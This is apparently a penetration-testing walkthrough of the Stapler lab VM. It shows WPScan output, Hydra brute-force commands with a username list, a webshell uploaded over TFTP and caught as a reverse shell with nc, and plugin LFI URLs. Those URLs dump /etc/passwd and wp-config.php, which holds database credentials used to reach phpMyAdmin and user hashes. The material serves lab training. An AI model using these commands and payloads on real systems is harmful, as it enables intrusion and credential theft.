   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: https://192.168.1.30:12380/blogblog/
[+] Started: Sun May 14 22:45:24 2017

[!] The WordPress 'https://192.168.1.30:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.30:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.30:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-includes/

[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number

[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7979
    Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://hackerone.com/reports/110801
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
    Reference: https://wpvulndb.com/vulnerabilities/8473
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
    Reference: https://wpvulndb.com/vulnerabilities/8474
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8475
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5

[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8488
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
    Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2

[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
    Reference: https://wpvulndb.com/vulnerabilities/8489
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
    Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
    Reference: http://avlidienbrunn.com/wp_some_loader.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9

[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
    Reference: https://wpvulndb.com/vulnerabilities/8615
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
    Reference: http://seclists.org/fulldisclosure/2016/Sep/6
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10

[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
    Reference: https://wpvulndb.com/vulnerabilities/8616
    Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
    Reference: https://wpvulndb.com/vulnerabilities/8716
    Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
    Reference: https://wpvulndb.com/vulnerabilities/8718
    Reference: https://www.mehmetince.net/low-severity-wordpress/
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
    Reference: https://wpvulndb.com/vulnerabilities/8719
    Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8720
    Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
    Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11

[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
    Reference: https://wpvulndb.com/vulnerabilities/8729
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
    Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
    Reference: http://seclists.org/oss-sec/2017/q1/563
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13

[!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
    Reference: https://wpvulndb.com/vulnerabilities/8768
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
    Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13

[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
    Reference: https://wpvulndb.com/vulnerabilities/8770
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
    Reference: http://seclists.org/oss-sec/2017/q1/562
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13

[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
    Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
    Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295

[+] WordPress theme in use: bhost - v1.2.9

[+] Name: bhost - v1.2.9
 |  Location: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.6
 |  Style URL: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...
                               
[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
 |  Latest version: 1.0 (up to date)
 |  Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 |  Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet
 |  Latest version: 3.3.2
 |  Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: shortcode-ui - v0.6.2
 |  Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/
 |  Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] The version is out of date, the latest version is 0.7.2
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor
 |  Latest version: 0.1-dev-20170511
 |  Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/
 |  Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/

[+] Finished: Sun May 14 22:54:19 2017
[+] Requests Done: 67551
[+] Memory used: 151.273 MB
[+] Elapsed time: 00:08:55

=============================================================================================================

root@Security-Audit-01:~# searchsploit advanced video
----------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                         |  Path
                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion             | exploits/php/webapps/39646.py
----------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@Security-Audit-01:~# searchsploit -x 39646.py
  Exploit: WordPress Plugin Advanced Video 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/39646/
     Path: /usr/share/exploitdb/exploits/php/webapps/39646.py
File Type: Python script, ASCII text executable, with CRLF line terminators

=============================================================================================================
Step 2. Gaining access
=> Method 1 - Anonymous user enumeration (SMB 139) + Brute-force on SSH with Login=pwd
=============================================================================================================

1. Use Hydra with the list of username from Enum4Linux
------------------------------------------------------
=>  HYDRA -e ns -v -L login.txt  -P password.txt  192.168.1.28 SSH
OR
=>  HYDRA -e ns -v -L login.txt  -P password.txt  192.168.1.28 FTP

Login.txt
--------
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Drew
SHAY
Taylor
mel
kai
NATHAN
www
elly
elly

2. We identified the following valid credentials: LSolum, SHayslett

3. ssh  SHayslett@192.168.1.28


===================================================================================================================================
Step 2. Gaining access
Method 2 - Anonymous upload of a Webshell on a TFTP server + Execution of the Webshell through the Web server listening on port 80
====================================================================================================================================

Step 1
-------
It is not possible to simply list the content of a TFTP sever.
To see if the TFTP server is linked to one of the Web server we can try to GET files that we have found on the Web server 
We tried the ".bashrc" file ()information of the NIKTO scan of the 80 port HTTP service). 
We understand that the tftp server is pointing at the same directory as the 80 port HTTP service
   
root@Security-Audit-01:~# tftp
tftp> connect 192.168.1.28
tftp> get .bashrc
Received 3888 bytes in 0.0 seconds


Step 2
-------
The next step is to upload a Webshell

tftp> put webshell.php
Sent 5688 bytes in 0.0 seconds
tftp> 

Step 3
------- 

We browse "http://192.168.1.28/webshell.php" and we obtain a reverse shell as "www" user

root@Security-Audit-01:~# nc -l -p 9004
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 15:35:36 up  2:49,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
id
uid=1028(www) gid=1028(www) groups=1028(www)



===================================================================================================================================
Step 2. Gaining access
Method 3 - Wordpress / PHPmyadmin / Mysql
====================================================================================================================================


Exploit: WordPress Plugin Advanced Video 1.0 - Local File Inclusion

root@Security-Audit-01:~# searchsploit -x 39646.py


Type in Firefox then a new image file containing the file wanted will be created in upload dir
-----------------------------------------------------------------------------------------------
https://192.168.1.28:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=rnd&term=rnd&thumb=/etc/passwd


https://192.168.1.28:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=rnd&term=rnd&thumb=../wp-config.php



root@Security-Audit-01:~/Desktop/Stapler/Wordpress# wget --no-check-certificate https://192.168.1.28:12380/blogblog/wp-content/uploads/1350418571.jpeg
--2018-07-22 19:14:37--  https://192.168.1.28:12380/blogblog/wp-content/uploads/1350418571.jpeg
Connecting to 192.168.1.28:12380... connected.
WARNING: The certificate of ‘192.168.1.28’ is not trusted.
WARNING: The certificate of ‘192.168.1.28’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.28’
HTTP request sent, awaiting response... 200 OK
Length: 0 [image/jpeg]
Saving to: ‘1350418571.jpeg’

1350418571.jpeg                 [ <=>                                        ]       0  --.-KB/s    in 0s      

2018-07-22 19:14:37 (0.00 B/s) - ‘1350418571.jpeg’ saved [0/0]

root@Security-Audit-01:~/Desktop/Stapler/Wordpress# cat 1350418571.jpeg 
root@Security-Audit-01:~/Desktop/Stapler/Wordpress# wget --no-check-certificate https://192.168.1.28:12380/blogblog/wp-content/uploads/1320637793.jpeg
--2018-07-22 19:17:44--  https://192.168.1.28:12380/blogblog/wp-content/uploads/1320637793.jpeg
Connecting to 192.168.1.28:12380... connected.
WARNING: The certificate of ‘192.168.1.28’ is not trusted.
WARNING: The certificate of ‘192.168.1.28’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.28’
HTTP request sent, awaiting response... 200 OK
Length: 2908 (2.8K) [image/jpeg]
Saving to: ‘1320637793.jpeg’

1320637793.jpeg             100%[===========================================>]   2.84K  --.-KB/s    in 0.001s  

2018-07-22 19:17:44 (4.24 MB/s) - ‘1320637793.jpeg’ saved [2908/2908]

root@Security-Audit-01:~/Desktop/Stapler/Wordpress# cat 1320637793.jpeg 
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash


root@Security-Audit-01:~/Desktop/Stapler/Wordpress# wget --no-check-certificate https://192.168.1.28:12380/blogblog/wp-content/uploads/1742085432.jpeg
--2018-07-22 19:23:10--  https://192.168.1.28:12380/blogblog/wp-content/uploads/1742085432.jpeg
Connecting to 192.168.1.28:12380... connected.
WARNING: The certificate of ‘192.168.1.28’ is not trusted.
WARNING: The certificate of ‘192.168.1.28’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.28’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘1742085432.jpeg’

1742085432.jpeg             100%[===========================================>]   2.97K  --.-KB/s    in 0.001s  

2018-07-22 19:23:10 (5.72 MB/s) - ‘1742085432.jpeg’ saved [3042/3042]

root@Security-Audit-01:~/Desktop/Stapler/Wordpress# cat 1742085432.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');



=============================

Then go to https://192.168.1.28:12380/phpmyadmin/index.php and login as root:plbkac

Go to the table WP-USER to see the passwords of users..

Extract les pwd hashs
----------------------------------------------
===Database wordpress
== Table structure for table wp_users
|------
|Column|Type|Null|Default
|------
|//**ID**//|bigint(20)|No|
|user_login|varchar(60)|No|
|user_pass|varchar(64)|No|
|user_nicename|varchar(50)|No|
|user_email|varchar(100)|No|
|user_url|varchar(100)|No|
|user_registered|datetime|No|0000-00-00 00:00:00
|user_activation_key|varchar(60)|No|
|user_status|int(11)|No|0
|display_name|varchar(250)|No|

